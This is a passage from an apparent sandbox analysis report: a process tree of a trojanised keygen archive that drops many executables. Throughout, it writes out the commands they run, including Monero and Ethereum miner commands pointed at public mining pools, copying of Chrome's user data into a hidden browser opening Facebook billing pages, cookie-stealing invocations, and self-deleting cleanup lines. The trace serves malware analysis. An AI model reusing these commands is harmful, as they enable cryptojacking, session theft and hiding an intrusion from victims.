                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:508
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:4372
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:5092
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:4480
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:3984
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4124
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:5004
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4380
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                              keygen-step-1.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4128
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                              keygen-step-2.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              PID:2912
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\59F8.tmp.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\59F8.tmp.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:4816
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\59F8.tmp.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2332
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                                                      6⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:680
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4916
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                      5⤵
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:5072
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                  keygen-step-3.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4184
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4344
                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                        5⤵
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:3180
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                    keygen-step-4.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:688
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\qiangli-game.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\qiangli-game.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:4968
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                        5⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:5112
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      PID:4396
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\617A.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\617A.tmp.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:4364
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\617A.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\617A.tmp.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5092
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1080
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:5284
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6459.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6459.tmp.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:4924
                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23067 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                          6⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          PID:4492
                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w25811@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5016
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:4888
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                              6⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:4280
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5056
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4580
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                6⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:6124
                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                              xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                              5⤵
                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                              PID:4912
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                              5⤵
                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:3620
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffb93804f50,0x7ffb93804f60,0x7ffb93804f70
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:5260
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1884 /prefetch:8
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4400
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1520 /prefetch:2
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:5304
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2296 /prefetch:8
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:2024
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:1
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:4768
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4076
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:2676
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:3892
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4448
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14415461113800738488,1187969426959069457,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5244
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                PID:4024
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:6032
                                                                                                                                                                                • C:\ProgramData\6377908.exe
                                                                                                                                                                                  "C:\ProgramData\6377908.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:1220
                                                                                                                                                                                • C:\ProgramData\1551934.exe
                                                                                                                                                                                  "C:\ProgramData\1551934.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                  PID:2912
                                                                                                                                                                                • C:\ProgramData\3435084.exe
                                                                                                                                                                                  "C:\ProgramData\3435084.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:5108
                                                                                                                                                                                  • C:\ProgramData\3435084.exe
                                                                                                                                                                                    "{path}"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5192
                                                                                                                                                                                  • C:\ProgramData\3435084.exe
                                                                                                                                                                                    "{path}"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:3576
                                                                                                                                                                                • C:\ProgramData\1806859.exe
                                                                                                                                                                                  "C:\ProgramData\1806859.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:1612
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4844
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:3040
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5220
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4988
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5252
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe"
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2748
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat" "
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2352
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe
                                                                                                                                                                                  keygen-pr.exe -p83fsase3Ge
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4660
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:5004
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4272
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe
                                                                                                                                                                                  keygen-step-1.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:756
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe
                                                                                                                                                                                  keygen-step-2.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:68
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\A132.tmp.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\A132.tmp.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      PID:4992
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\A132.tmp.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:5192
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:5264
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe" >> NUL
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1220
                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                            ping 127.0.0.1
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                            PID:68
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:2352
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 268
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:2312
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe
                                                                                                                                                                                        keygen-step-3.exe
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4292
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:4100
                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                              ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:196
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe
                                                                                                                                                                                          keygen-step-4.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4532
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\qiangli-game.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX3\qiangli-game.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:4656
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:4160
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4808
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AE13.tmp.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\AE13.tmp.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:4632
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\AE13.tmp.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\AE13.tmp.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:4700
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\B24A.tmp.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\B24A.tmp.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:4928
                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                    -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23132 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                    PID:4976
                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w11403@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:4824
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4700
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                                                  PID:1392
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
